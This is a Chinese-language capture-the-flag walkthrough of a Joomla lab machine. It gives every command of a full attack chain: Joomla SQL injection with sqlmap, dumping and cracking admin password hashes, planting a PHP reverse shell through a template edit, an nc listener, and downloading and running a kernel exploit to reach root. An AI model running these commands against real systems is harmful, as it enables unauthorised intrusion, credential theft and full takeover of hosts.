nmap扫描起手
nmap -sT 192.168.1.91 -p - -sV -O -sC
只开了80,上去看看。nmap 用脚本扫出了这是一个Joomla构建的网站。
信息很少,但至少知道一个账号admin。先用joomscan扫一下看看。
kali 中没有joomscan,去github上下载一下。
https://github.com/rezasp/joomscan
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl -u 192.168.1.91
发现了管理后台页面,还有Joomla的版本。先看看这个版本有没有漏洞。
存在一个sql注入漏洞。看一下这个漏洞利用文件。
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
那就用sqlmap.
sqlmap -u "http://192.168.1.91/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
执行后返回,由于数据库登陆入口,先对joomladb数据库进行操作
接下来是,把上面的–dbs 改成–tables -D joomladb指定数据库。
发现了几个user表。看一下users
-T users -D joomladb --columns
我没想到他没枚举出列名来。
我发现我前面的表名指定错了。。。。。。
再跑一次吧,哈。
sqlmap -u "http://192.168.1.91/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T '#__users' --column
果然安全是个细活。
sqlmap -u "http://192.168.1.91/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T '#__users' -C id,password,username --dump
用hash-identifier 无法识别,这串hash.hashcat -m 400 类型的joomla,提示长度不对。
最后我在https://hashcat.net/wiki/doku.php?id=example_hashes
找到一个类似格式的hash
保存hash值后破解。
hashcat -a 0 -m 3200 ./2.hash /usr/share/wordlists/rockyou.txt
登陆后台看看。看看有没有上传代码或者执行代码的地方。
在joomal的后台中可以编辑模板的PHP代码。可以自行搜索 joomla shell。
在这里我们利用Beez3详细信息和文件之一
这里的话,选任何一个PHP页面都可以,关键是你要知道路径。
这里的路径实际上是/templates/beez3/html/
如果不知道路径,可以用gobuster这样的工具去爆破目录。
上传反弹shell
/usr/share/webshells/php/php-reverse-shell.php
用kali自带的反弹shell
nc -lvp 4444
python升级shell
python -c "import pty;pty.spawn('/bin/bash')"
提权。
看来没有suid提权,也不能用su,sudo.
那看看内核吧。
uname -a
cat /etc/lsb-release
利用工具linux-exploit-suggester,枚举内核漏洞。
https://github.com/mzet-/linux-exploit-suggester
我kali机上以及下好了,所以建立一个web服务器,让靶机下载。
python -m SimpleHTTPServer 80
cp les.sh /var/www/html/
提示权限拒绝。换到/tmp目录就好了。
chmod +x les.sh
我选择了这个进行尝试。去下载他的poc
kali下载后我把他移动到web目录下进行下载。
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
提示警告在doubleput.c,但实际上仍然是起作用的。
运行 ./doubleput
okok,我们现在是root
拿到flag。